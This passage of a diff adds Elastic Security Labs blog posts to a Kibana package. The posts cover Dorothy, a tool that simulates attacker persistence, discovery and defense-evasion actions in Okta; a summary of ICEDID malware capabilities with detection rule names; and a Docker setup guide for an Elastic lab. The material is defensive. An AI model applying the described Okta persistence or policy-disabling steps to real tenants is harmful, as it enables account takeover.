+ "document": "---\ntitle: \"Testing your Okta visibility and detection with Dorothy and Elastic Security\"\nslug: \"testing-okta-visibility-and-detection-dorothy\"\ndate: \"2022-06-02\"\ndescription: \"Dorothy is a tool for security teams to test their visibility and detection capabilities for their Okta environment. IAM solutions are frequently targeted by adversaries but poorly monitored. Learn how to get started with Dorothy in this post.\"\nauthor:\n - slug: david-french\nimage: \"blog-thumb-dorothy-cow.jpg\"\ncategory:\n - slug: security-research\n---\n\nWhen approached by stakeholders in their organization, few security teams can confidently demonstrate that logging and alerting capabilities are working as expected. Organizations have become more distributed and reliant on cloud offerings for use cases such as identity and access management, user productivity, and file storage. Meanwhile, adversaries have extended their operational capabilities in cloud environments. It is crucial that security teams are able to monitor these systems for abuse in order to protect their organization’s data from attack.\n\n[Dorothy](https://github.com/elastic/dorothy) is a free and open tool to help security teams test their visibility, monitoring, and detection capabilities for Okta Single Sign-On (SSO) environments. We’ll demonstrate how Dorothy can be used to execute tests and how [Elastic Security](https://www.elastic.co/security) can be used to alert on relevant and suspicious behavior using our [free and open detection rules](https://github.com/elastic/detection-rules/).\n\n## What is Okta SSO?\n\nFor those who aren’t familiar, [Okta SSO](https://www.okta.com/products/single-sign-on/) is a cloud-based identity management solution that allows users to authenticate to a variety of systems and applications within their organization using a single user account. 
Informing end users that they only have to remember _one_ username and password instead of ten or more reduces the risk that they’ll develop poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barrier to entry for attackers. Many attackers will simply move on and look for an easier target when they discover that MFA is enforced in their target’s network or user account.\n\nWhile SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems offer a type of skeleton key to many systems and applications, and are often an attractive target for attackers. It’s critical that security teams understand what normal behavior looks like in their Okta environment so that they can identify suspicious activity more easily.\n\n## Meet Dorothy\n\n[Dorothy](https://github.com/elastic/dorothy) has 25+ modules to simulate actions an attacker may take while operating in an Okta environment and behavior that security teams should monitor for, detect, and alert on. All modules are mapped to the relevant [MITRE ATT&CK®](https://attack.mitre.org/) tactics, such as Persistence, Defense Evasion, Discovery, and Impact.\n\n\n\nDorothy was created to help defenders test their security visibility and controls, and does not provide any modules to obtain initial access or escalate privileges in an Okta environment. To execute actions using Dorothy, a valid Okta API token is required that is linked to a user with one or more administrator roles assigned.\n\nA user-friendly shell interface with contextual help is provided for navigation between menus and modules, helping guide the user through simulated intruder scenarios. 
Other features include configuration profiles to manage connections to individual Okta environments and detailed logging with the option of indexing events into Elasticsearch to provide an audit trail of the actions that were executed using Dorothy.\n\n## Executing actions in an Okta environment using Dorothy\n\nIn this section, we demonstrate how to execute some of Dorothy’s modules in an Okta environment. Figure 2 below shows the typical workflow for an Elastic Security user. After this demonstration, you should be comfortable with heading over to Dorothy’s GitHub repository and following the “Getting Started” steps in the project’s [wiki](https://github.com/elastic/dorothy/wiki).\n\n\n\n### whoami?\n\nLet’s put ourselves in an attacker's shoes and think about what actions they might take while operating in an Okta environment. As an attacker with an initial foothold, the first questions I'll have are about the user for which I have an API token. Let's simulate this attacker action through Dorothy's whoami command to look at the associated user’s login ID, last login time, and last password change.\n\nNow that we have a better understanding of the user account we have control of, we’ll list Dorothy’s modules and check out the help menu before making our next move.\n\n\n\n_Figure 3 - Executing Dorothy’s whoami and list-modules commands_\n\n### Discovery\n\nDorothy has several discovery modules we can use to simulate the knowledge an attacker might obtain about an Okta environment. 
Adversaries will often spend time to learn details of an environment after obtaining initial access — details that are essential for orienting themselves before planning their next steps.\n\nLet’s try and gain some knowledge about the Okta environment by harvesting the following information:\n\n- Users - A list of names, login IDs, email addresses, password recovery questions, and the status of each user will be useful when choosing which accounts to take control of, modify, or leave intact to avoid detection\n- Policies - [Okta policies](https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm) are used to control elements of security, including password complexity and MFA requirements, as well as the devices that users are permitted to use. This knowledge will come in handy if we decide to weaken some components of the target’s security configuration\n- Zones - [Network zones](https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm) can be used to define security perimeters for an Okta environment. Similar to policies, this information helps us learn how the environment is configured and make informed decisions before implementing any changes on how traffic is allowed or blocked\n\nFinally, we’ll execute the find-admins module to enumerate the roles of each Okta user and identify which users have one or more administrator roles assigned to them.\n\n\n\n_Figure 4 - Executing Dorothy’s “discovery” modules to gain knowledge about the Okta environment_\n\nOther discovery modules to help with information gathering tasks include find-users-without-mfa to find users who may authenticate using only a username and password and find-admin-groups to identify user groups that have one or more administrator roles assigned to them.\n\n### Persistence\n\nOnce an attacker has obtained access to their target environment, they may look for opportunities to establish persistence. 
Persistence helps an attacker maintain access in the event that they lose their initial foothold. A common example of how an adversary might lose their access is when the security team detects their presence and disables the compromised user account that the attacker is utilizing or blocks their communications at the network perimeter.\n\nHaving one or more persistence mechanisms in place means that the attacker will be able to continue their mission if one of their pathways is blocked or interrupted. In this example, we’ll use Dorothy's create-user and create-admin-user modules to create an Okta user and [assign an administrator role](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_administrator_role_assigned_to_okta_user.toml) to the new user. Next, we'll create a recovery question for another Okta user so that we can go through the process of resetting the password for that user and take control of their account as another method of persistence.\n\n\n\nDorothy has other persistence modules to help us understand the steps an attacker might take, such as reset-factors to [remove a user's enrolled authentication factors](https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) and reset-password to generate a one-time link to reset a user's password.\n\n### Defense Evasion\n\nAdversaries will attempt to execute defense evasion techniques to avoid detection throughout their mission. For example, an attacker may attempt to disable security logging to render the security team blind to their nefarious actions.\n\nAt this point, we’ve gained knowledge about the environment and configured a couple of forms of persistence. 
Let’s execute Dorothy's [change-policy-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/okta_attempt_to_deactivate_okta_policy.toml) and [change-zone-state](https://github.com/elastic/detection-rules/blob/main/rules/okta/attempt_to_deactivate_okta_network_zone.toml) modules to weaken the “target's” security controls.\n\n\n\n_Figure 6 - Deactivating Okta policy and network zone objects_\n\nOther defense evasion-themed modules can activate, deactivate, or modify other Okta objects such as applications and individual policy rules.\n\nWe’ll stop our fictitious attack scenario here, but if you’re curious to learn what else Dorothy can do, head over to the [GitHub repository](https://github.com/elastic/dorothy).\n\n## Detecting suspicious behavior with Elastic Security\n\nIn this section, we'll demonstrate how Okta's [system log](https://help.okta.com/en/prod/Content/Topics/Reports/Reports_SysLog.htm) powers our free detection rules to monitor for and alert teams to suspicious behavior.\n\nOkta's system log provides an audit trail of activity that was observed in an organization's environment. This includes activity such as users logging in or changing their password, administrators making configuration changes, and much more. This data source is incredibly useful for security monitoring, investigations, compliance, and response activities.\n\n### Ingesting Okta system logs with Fleet\n\n[Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) provides a web-based UI in Kibana to add and manage integrations for popular services and platforms including Okta, AWS, Azure, Google Cloud Platform, Google Workspace, and many others. 
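\n\nEach Okta system log event is a JSON document whose fields can be normalized into ECS. As a hedged sketch (the Okta-side field names follow the System Log API, but the mapping itself is an illustrative subset, not the integration's actual ingest pipeline):\n\n```py\n# Trimmed, illustrative Okta system log event (real events carry many more fields)\nokta_event = {\n    \"eventType\": \"user.session.start\",\n    \"published\": \"2022-06-02T12:00:00.000Z\",\n    \"actor\": {\"alternateId\": \"jane@example.com\"},\n    \"outcome\": {\"result\": \"SUCCESS\"},\n    \"client\": {\"ipAddress\": \"203.0.113.10\"},\n}\n\n# Map a handful of fields toward ECS-style names (simplified)\necs = {\n    \"event.action\": okta_event[\"eventType\"],\n    \"@timestamp\": okta_event[\"published\"],\n    \"user.name\": okta_event[\"actor\"][\"alternateId\"],\n    \"event.outcome\": okta_event[\"outcome\"][\"result\"].lower(),\n    \"source.ip\": okta_event[\"client\"][\"ipAddress\"],\n}\n```\n\n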
Fleet’s Okta integration provides an easy way to ingest and normalize Okta’s system log events.\n\n\n\nAn [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) is also available for teams that already use Beats.\n\n### Detecting suspicious behavior with Elastic Security’s free detection rules\n\nThe Elastic Security Protections Team researches adversary tradecraft in order to develop detections and preventions for endpoint, cloud, and network platforms. Our [detection rules](https://github.com/elastic/detection-rules) are free and developed in the open alongside the broader security community.\n\nOur Okta rules utilize the indexed system log events that are normalized into [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) and alert security teams to relevant and suspicious behavior.\n\nFigure 8 below shows a number of alerts in Elastic Security after Dorothy was used to simulate actions that an attacker might take while operating in an Okta environment.\n\n\n\nWhat about those pesky false positives? Adding exceptions to rules in Elastic Security to filter routine and expected behavior is straightforward. This feature includes an option to close all alerts that match the exception to save you time.\n\n\n\n## Measure your cloud cover with Dorothy\n\nOkta and other identity management solutions are frequently targeted by adversaries, but are often poorly monitored, if at all. We created Dorothy as a tool to help security teams understand how adversaries can operate within Okta environments, further empowering them to test their visibility and the efficacy of our free and open detection rules.\n\nYou can learn how to get started with Dorothy by visiting the project’s [wiki](https://github.com/elastic/dorothy/wiki). 
If you're not already an Elastic Security user, you can sign up for a [free cloud trial](https://www.elastic.co/cloud/) today and check out our free [detection rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo).\n"
+ },
+ "title": "Testing your Okta visibility and detection with Dorothy and Elastic Security",
+ "slug": "testing-okta-visibility-and-detection-dorothy",
+ "date": "2022-06-02",
+ "description": "Dorothy is a tool for security teams to test their visibility and detection capabilities for their Okta environment. IAM solutions are frequently targeted by adversaries but poorly monitored. Learn how to get started with Dorothy in this post.",
+ "author": [
+ {
+ "slug": "david-french"
+ }
+ ],
+ "image": "blog-thumb-dorothy-cow.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-testing_okta_visibility_and_detection_dorothy-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json
new file mode 100644
index 00000000000..40ccc19af00
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-thawing_the_permafrost_of_icedid_summary-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Thawing the permafrost of ICEDID Summary\"\nslug: \"thawing-the-permafrost-of-icedid-summary\"\ndate: \"2023-03-21\"\nsubtitle: \"Elastic Security Labs details a recent ICEDID GZip variant\"\ndescription: \"Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, capabilities, and design.\"\nauthor:\n - slug: cyril-francois\n - slug: daniel-stepanic\nimage: \"blog-thumb-tree-icicles.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - icedid\n---\n\nICEDID is a malware family first [described](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/) in 2017 by IBM X-force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family, but has achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of other distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, helps mitigate this threat.\n\nElastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, highlight its capabilities, and deliver insights about how it is designed.\n\n### Execution Chain\n\nICEDID employs multiple stages before establishing persistence via a scheduled task and may retrieve components from C2 dynamically. 
The following diagram illustrates major phases of the ICEDID execution chain.\n\n\n\n### Research Paper Overview\n\nElastic Security Labs described the full execution chain of a recent ICEDID sample in a detailed research [paper](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf) hosted at Elastic Security Labs. In addition, we provide a comprehensive analysis of this malware sample and capabilities, including:\n\n- Virtualization detection and anti-analysis\n- C2 polling operations\n- Shellcode execution methods\n- Credential access mechanisms\n- Websocket connections\n- Installing a web browser proxy to capture all user traffic\n- Reverse shell and VNC server installation\n- Certificate pinning\n- Data validation\n- ICEDID observable TTPs\n- Links to useful resources from Elastic\n\n### Detections and preventions\n\n#### Detection logic\n\n- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)\n- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)\n- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)\n- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)\n- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)\n- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)\n- [Suspicious Windows Script Interpreter Child Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_windows_script_interpreter_child_process.toml)\n- [RunDLL32 with Unusual 
Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)\n\n#### Preventions (source: [https://github.com/elastic/protections-artifacts/](https://github.com/elastic/protections-artifacts/))\n\n- Malicious Behavior Detection Alert: Command Shell Activity\n- Memory Threat Detection Alert: Shellcode Injection\n- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32\n- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process\n- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments\n- Malicious Behavior Detection Alert: Windows Script Execution from Archive File\n\n#### YARA\n\nElastic Security has created multiple YARA rules related to the different stages/components within an ICEDID infection; these can be found in the signature linked below:\n\n- [Windows.Trojan.ICEDID](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar)\n\n---\n\nElastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries through the publication of detailed detection logic, protections, and applied threat research.\n\nFollow us on @elasticseclabs or visit our research portal for more resources and research.\n"
+ },
+ "title": "Thawing the permafrost of ICEDID Summary",
+ "slug": "thawing-the-permafrost-of-icedid-summary",
+ "subtitle": "Elastic Security Labs details a recent ICEDID GZip variant",
+ "date": "2023-03-21",
+ "description": "Elastic Security Labs analyzed a recent ICEDID variant consisting of a loader and bot payload. By providing this research to the community end-to-end, we hope to raise awareness of the ICEDID execution chain, capabilities, and design.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "blog-thumb-tree-icicles.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware analysis",
+ "icedid"
+ ]
+ },
+ "id": "security_labs_content-thawing_the_permafrost_of_icedid_summary-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json
new file mode 100644
index 00000000000..3a98ee9e5a9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-the_elastic_container_project-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"The Elastic Container Project for Security Research\"\nslug: \"the-elastic-container-project\"\ndate: \"2023-03-01\"\nsubtitle: \"Using Docker to stand up the Elastic Stack\"\ndescription: \"The Elastic Container Project provides a single shell script that will allow you to stand up and manage an entire Elastic Stack using Docker. This open source project enables rapid deployment for testing use cases.\"\nauthor:\n - slug: andrew-pease\n - slug: colson-wilhoit\n - slug: derek-ditch\nimage: \"blog-thumb-container-barge.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n## Preamble\n\nThe Elastic Stack is a modular data analysis ecosystem. While this allows for engineering flexibility, it can be cumbersome to stand up a development instance for testing. The easiest way to stand up the Elastic Stack is to use [Elastic Cloud](https://cloud.elastic.co) - it’s completely turnkey. However, there could be situations where Elastic Cloud won’t work for your testing environment. To help with this, this blog will provide you with the necessary information required to quickly and painlessly stand up a local, fully containerized, TLS-secured Elastic Stack with Fleet and the Detection Engine enabled. You will be able to create a Fleet policy, install an Elastic Agent on a local host or VM, and send the data into your stack for monitoring or analysis.\n\nThis blog will cover the following:\n\n- The Elastic Stack\n- The Elastic Container project\n- How to use the Elastic Container project\n- How to navigate Kibana and use its related features for security research\n\n> The Elastic Container Project is not sponsored or maintained by the company, Elastic. 
Design and implementation considerations for the project may not reflect Elastic’s guidance on deploying a production-ready stack.\n\n## The Elastic Stack\n\nThe Elastic Stack is made up of several different components, each of which provides a distinct capability that can be utilized across a wide variety of use cases.\n\n### Elasticsearch\n\nElasticsearch is a distributed, RESTful search and analytics engine. As the heart of the Elastic Stack, it centrally stores your data for lightning-fast search, fine-tuned relevancy, and powerful analytics that scale with ease.\n\n### Kibana\n\nKibana is the user interface that lets you visualize your Elasticsearch data and manage the Elastic Stack.\n\n### The Elastic Agent\n\nThe Elastic Agent is the modular agent that allows you to collect data from an endpoint or act as a vehicle to ship data from 3rd party sources, like threat feeds. The Elastic Security integration for endpoints prevents ransomware and malware, detects advanced threats, and arms responders with vital investigative context.\n\n## The Elastic Container Project\n\n\n\nAs mentioned above, the Elastic Stack is modular, which makes it very flexible for a wide variety of use cases, but this can add complexity to the implementation.\n\nThe Elastic Container project is an open source project that uses Docker Compose as a way to stand up a fully-functional Elastic Stack for use in non-production environments. 
This project is not sponsored or maintained by the Elastic company.\n\n### Introduction\n\nThe [Elastic Container Project](https://github.com/peasead/elastic-container) includes three main components:\n\n- Elasticsearch\n- Kibana\n- the Elastic Agent\n\nThe project leverages [Docker Compose](https://docs.docker.com/compose/), which is a tool to build, integrate, and manage multiple Docker containers.\n\nTo simplify the management of the containers, the project includes a shell script that allows for the staging, starting, stopping, and destroying of the containers.\n\nAdditionally, the project makes use of self-signed TLS certificates between Elasticsearch and Kibana, Kibana and your web browser, the Elastic Agent and Elasticsearch, and the Elastic Agent and Kibana.\n\n### Prerequisites\n\nThe project was built and tested on Linux and macOS operating systems. If you are using Windows, you won’t be able to use the included shell script, but you can still run native Docker Compose commands and manually perform post-deployment steps.\n\nWhile not thoroughly tested, it is recommended that you allocate 4 cores and 8 GB of RAM to Docker.\n\nThere are only a few packages you need to install:\n\n- Docker\n- Docker Compose\n- jq\n- Git\n- cURL\n\n#### macOS\n\nIf you’re running on macOS, you can install the prerequisites using [Homebrew](https://brew.sh/), which is an open-source package management system for macOS. Check out the Homebrew site for information on installing it if needed.\n\n```\n**brew install jq git**\n**brew install --cask docker**\n```\n\n#### Linux\n\nIf you’re running on Linux, you can install the prerequisites using your package management system ( **DNF** , **Yum** , or **APT** ).\n\n**RPM-based distributions**\n\n```\n**dnf install jq git curl**\n```\n\n**Ubuntu**\n\n```\n**apt-get install jq git curl**\n```\n\nYou'll also need the Docker suite (including the **docker-compose-plugin** ). 
Check out Docker's [installation instructions](https://docs.docker.com/engine/install/) for your OS.\n\n### Cloning the project repository\n\nThe Elastic Container project is stored on GitHub. As long as you have Git installed, you can clone it from your CLI of choice.\n\n```\n**git clone https://github.com/peasead/elastic-container.git**\n**cd elastic-container**\n```\n\nThis repository includes everything needed to stand up the Elastic Stack containers using a single shell script.\n\n### Setting credentials\n\nBefore proceeding, ensure you update the credentials for the Elastic and Kibana accounts in the **.env** file located in the root directory of the repository from their defaults of **changeme**.\n\n### The shell script\n\nAs mentioned above, the project includes a shell script that will simplify the management of the containers.\n\n```\n**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**\n**actions:**\n **stage downloads all necessary images to local storage**\n **start creates network and starts containers**\n **stop stops running containers without removing them**\n **destroy stops and removes the containers, the network and volumes created**\n **restart simply restarts all the stack containers**\n **status check the status of the stack containers**\n **help print this message**\n **flags:**\n **-v enable verbose output**\n```\n\n#### Stage\n\nThis option downloads all of the containers from the Elastic Docker hub. This is useful if you are going to be building the project on a system that does not always have Internet access. 
This is not required; you can skip this option and move directly to the start option, which will download the containers.\n\n```\n**$ ./elastic-container.sh stage**\n**8.3.0: Pulling from elasticsearch/elasticsearch**\n**7aabcb84784a: Already exists**\n**e3f44495617d: Downloading [====\\\\>] 916.5kB/11.26MB**\n**52008db3f842: Download complete**\n**551b59c59fdc: Downloading [\\\\>] 527.4kB/366.9MB**\n**25ee26aa662e: Download complete**\n**7a85d02d9264: Download complete**\n**…**\n```\n\n#### Start\n\nThis option will create the container network, download all of the required containers, set up the TLS certificates, and start and connect Elasticsearch, Kibana, and the Fleet server containers together. This option is a “quick start” to get the Elastic Stack up and running. If you have not changed your credentials in the .env file from the defaults, the script will exit.\n\n```\n**$ ./elastic-container.sh start**\n\n**Starting Elastic Stack network and containers**\n**[+] Running 7/8**\n **⠿ Network elastic-container\\_default Created 0.0s**\n **⠿ Volume \"elastic-container\\_certs\" Created 0.0s**\n **⠿ Volume \"elastic-container\\_esdata01\" Created 0.0s**\n **⠿ Volume \"elastic-container\\_kibanadata\" Created 0.0s**\n **⠿ Container elasticsearch-security-setup Waiting 2.0s**\n **⠿ Container elasticsearch Created 0.0s**\n**…**\n```\n\n#### Stop\n\nThis option will stop all running containers in the project, but will not remove them.\n\n```\n**$ ./elastic-container.sh stop**\n\n**Stopping running containers.**\n**[+] Running 4/4**\n **⠿ Container elastic-agent Stopped 0.0s**\n **⠿ Container kibana Stopped 0.0s**\n **⠿ Container elasticsearch Stopped 0.0s**\n **⠿ Container elasticsearch-security-setup Stopped**\n**…**\n```\n\n#### Destroy\n\nThis option will stop all running containers in the project, remove the container network, remove all data volumes, and remove all containers.\n\n```\n**$ ./elastic-container.sh destroy**\n\n**#####**\n**Stopping and removing 
the containers, network, and volumes created.**\n**#####**\n**[+] Running 8/4**\n **⠿ Container elastic-agent Removed 0.0s**\n **⠿ Container kibana Removed 0.0s**\n **⠿ Container elasticsearch Removed 0.0s**\n **⠿ Container elasticsearch-security-setup Removed 0.3s**\n **⠿ Volume elastic-container\\_esdata01 Removed 0.0s**\n **⠿ Network elastic-container\\_default Removed 0.1s**\n**…**\n```\n\n#### Restart\n\nThis option restarts all of the project containers.\n\n```\n**$ ./elastic-container.sh restart\n\n#####\nRestarting all Elastic Stack components.\n#####\nName Command State Ports\n---------------------------\nelasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\\\>9200/tcp, 9300/tcp\nfleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\\\>8220/tcp\nkibana /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:5601-\\\\>5601/tcp**\n```\n\n#### Status\n\nThis option returns the status of the project containers.\n\n```\n**$ ./elastic-container.sh status**\n**Name Command State Ports**\n**---------------------------**\n**elasticsearch /bin/tini -- /usr/local/bi ... Up (healthy) 0.0.0.0:9200-\\\\>9200/tcp, 9300/tcp**\n**fleet-server /usr/bin/tini -- /usr/loca ... Up 0.0.0.0:8220-\\\\>8220/tcp**\n**kibana /bin/tini -- /usr/local/bi ... 
Up (healthy) 0.0.0.0:5601-\\\\>5601/tcp**\n```\n\n#### Clear\n\nThis option clears all documents in the logs and metrics indices.\n\n```\n**$ ./elastic-container.sh clear**\n\n**Successfully cleared logs data stream**\n**Successfully cleared metrics data stream**\n```\n\n#### Help\n\nThis option provides instructions on using the shell script.\n\n```\n**$ ./elastic-container.sh help**\n\n**usage: ./elastic-container.sh [-v] (stage|start|stop|restart|status|help)**\n**actions:**\n **stage downloads all necessary images to local storage**\n **start creates a container network and starts containers**\n **stop stops running containers without removing them**\n **destroy stops and removes the containers, the network and volumes created**\n **restart simply restarts all the stack containers**\n **status check the status of the stack containers**\n**clear all documents in logs and metrics indexes**\n **help print this message**\n**flags:**\n **-v enable verbose output**\n```\n\n## Getting Started\n\nNow that we’ve walked through the project overview and the shell script, let’s go through the process of standing up your own stack.\n\n### Updating variables\n\nAll of the variables are controlled in an environment file ( **.env** ) that is at the root of the repository. The only things that you must change are the default usernames and passwords for **elastic** and **kibana**.\n\nOpen the **.env** file with whatever text editor you’re most comfortable with and update the **ELASTIC_PASSWORD** and **KIBANA_PASSWORD** variables from **changeme** to something secure. 
If you do not update the credentials from the defaults in the **.env** file, the script will exit.\n\nIf you want to change the other variables (such as the stack version), you can do so in this file.\n\n### Starting the Elastic Stack\n\nStarting the project containers is as simple as running the **elastic-container.sh** shell script with the start option.\n\n```\n**$ ./elastic-container.sh start**\n\n**Starting Elastic Stack network and containers\n[+] Running 7/8\n⠿ Network elastic-container\\_default Created 0.0s\n⠿ Volume \"elastic-container\\_certs\" Created 0.0s\n⠿ Volume \"elastic-container\\_esdata01\" Created 0.0s\n⠿ Volume \"elastic-container\\_kibanadata\" Created 0.0s\n⠿ Container elasticsearch-security-setup Waiting 2.0s\n⠿ Container elasticsearch Created 0.0s\n⠿ Container kibana Created 0.1s\n⠿ Container fleet-server Created 0.2s\n\nAttempting to enable the Detection Engine and Prebuilt-Detection Rules\nKibana is up. Proceeding\nDetection engine enabled. Installing prepackaged rules.\nPrepackaged rules installed!\nWaiting 40 seconds for Fleet Server setup\nPopulating Fleet Settings\nREADY SET GO!\n\nBrowse to https://localhost:5601\nUsername: elastic\nPassphrase: you-changed-me-from-the-default-right?**\n```\n\n### Accessing the Elastic Stack\n\nOnce the containers have all downloaded and started, you’ll get an output that tells you to browse to **https://localhost:5601**.\n\n**Note:** You’ll need to accept the self-signed TLS certificate.\n\n## Enabling the Platinum Features\n\nEnabling the Platinum license features is completely optional. Security features, like anti-malware, EDR, EPP, etc., are included in the Basic license. Memory, behavior, and ransomware protections are Platinum license features. If you want to change your license, you can do that with the **.env** file or from within Kibana. 
You can update to Elastic Platinum for 30 days.\n\nIf you want to use the **.env** file so that the features are enabled when the stack is built, change **LICENSE=basic** to **LICENSE=trial** and then start the project as normal.\n\nIf you prefer to use Kibana, click on the hamburger menu, and then click on Stack Management.\n\n\n\nClick on License Management and then “Start a 30-day trial”.\n\n\n\n## Creating a Fleet policy\n\nNow that we have the entire Elastic Stack up and running, we can make a [Fleet](https://www.elastic.co/guide/en/kibana/current/fleet.html) policy. Fleet is a subroutine of an [Elastic Agent](https://www.elastic.co/elastic-agent) (which was built when we ran the **start** option in the shell script) that enables you to manage other Elastic Agents, policies, and integrations.\n\n> Fleet is managed in Kibana, the UI that allows you to interact with data stored in Elasticsearch and manage your Elastic stack. If you’re interested in learning more about Kibana, check out the [free](https://www.elastic.co/training/free#quick-starts) [training](https://www.elastic.co/training/free#how-to) [videos](https://www.elastic.co/training/free#fundamentals).\n\nLog into your Kibana instance and click on the “hamburger” menu on the top left, and navigate down to “Fleet”, under the “Management” section.\n\n\n\nNext, click on the “Agent policies” tab and then the “Create agent policy” button.\n\n\n\nGive your new policy a name and a description (optional). Normally, we uncheck the “Collect agent logs” and “Collect agent metrics” options because it’s additional data going to the stack that we generally don’t need for our specific use case. 
If you’re doing troubleshooting or interested in what’s happening behind the scenes, this data can help you understand that.\n\n\n\nNext, click on your new policy and the blue “Add integration” button.\n\n\n\n\n\nThere are hundreds of integrations, but the ones that we’re most interested in for this blog are for Elastic Security.\n\nTo install Elastic Security, simply click on the tile on the main integrations page or search for “security”.\n\n\n\nNext, click the “Add Endpoint and Cloud Security” button to install this integration into the policy we just created.\n\n\n\nName the integration and click the blue “Save and continue” button.\n\n\n\n> While the Endpoint and Cloud Security and System integrations will collect security related logs, if you’re using Sysmon on a Windows host, you may want to add the “Windows” integration to collect those logs.\n\nOnce the integration is installed, you’ll be prompted to add more Agents or to do that later. Select the “Add Elastic Agent later” option so we can make a few more changes to our policy.\n\n\n\nNow we’ll be dropped back to our policy page.\n\nWe should have two integrations for our policy: **security** and **system-1**.\n\n\n\nBefore we add any agents, we’ll want to set our Elastic Agent to Detect (so that it allows the malware to completely execute), register the Elastic Agent as a trusted AV solution (Windows only), and instruct the Endpoint and Cloud Security integration to collect memory samples from security events. 
This is tremendously helpful for “fileless” malware that injects directly into memory, like Cobalt Strike.\n\n> If you want to learn more about extracting malware beacons from events generated by the Elastic Agent, check out our other [publications](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) and [repositories](https://github.com/elastic/malware-exquacker).\n\nTo allow the malware to continue to execute, on your “Windows” policy page, click on the name of the integration (“security” in our example) and set the Protection level to “Detect”.\n\n\n\nRepeat these steps for the Ransomware, Memory threat protections, and Malicious behavior sections.\n\n> We’re setting the Elastic Agent to Detect so that the malware we’re detonating will run completely so that we can analyze the entire execution chain. If you want the malware to be stopped, you can leave this in Prevent mode.\n\nNext, scroll to the bottom and select the “Register as antivirus” toggle and click on the “Show advanced settings” hyperlink.\n\n\n\nScroll down to the **windows.advanced.memory_protection.shellcode_collect_sample** , **windows.advanced.memory_protection.memory_scan_collect_sample** , and **windows.advanced.memory_protection.shellcode_enhanced_pe_parsing** options and set each value to **true**.\n\n\n\n> As mentioned above, these steps are for labs, sandboxes, testing, etc. These settings can generate a lot of data, so setting these for production will need resourcing and sizing considerations.\n\nIf you’re making a policy for Linux or macOS, repeat these for the proper OS.\n\nOnce we’re done with all of the post-installation configurations, we 